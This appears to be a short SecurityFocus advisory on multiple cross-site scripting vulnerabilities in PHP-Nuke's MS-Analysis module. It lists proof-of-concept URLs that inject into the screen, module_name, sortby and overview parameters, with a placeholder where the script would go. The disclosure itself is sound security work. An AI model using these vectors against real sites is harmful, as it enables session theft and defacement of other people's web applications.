PHP-Nuke MS-Analysis Module Multiple Cross-Site Scripting Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

http://www.example.org/nuke70/modules.php?name=MS_Analysis&file=index&op=MSAnalysisGeneral&screen=>[xss_code_here]&overview=1&sortby=
http://www.example.org/nuke70/modules/MS_Analysis/title.php?module_name=>[xss_code_here]
http://www.example.org/nuke70/modules.php?name=MS_Analysis&file=index&op=MSAnalysisGeneral&screen=3&overview=1&sortby=>[xss_code_here]
http://www.example.org/nuke70/modules.php?name=MS_Analysis&file=index&op=MSAnalysisGeneral&screen=13&overview=>[xss_code_here]&sortby=


 

Privacy Statement
Copyright 2010, SecurityFocus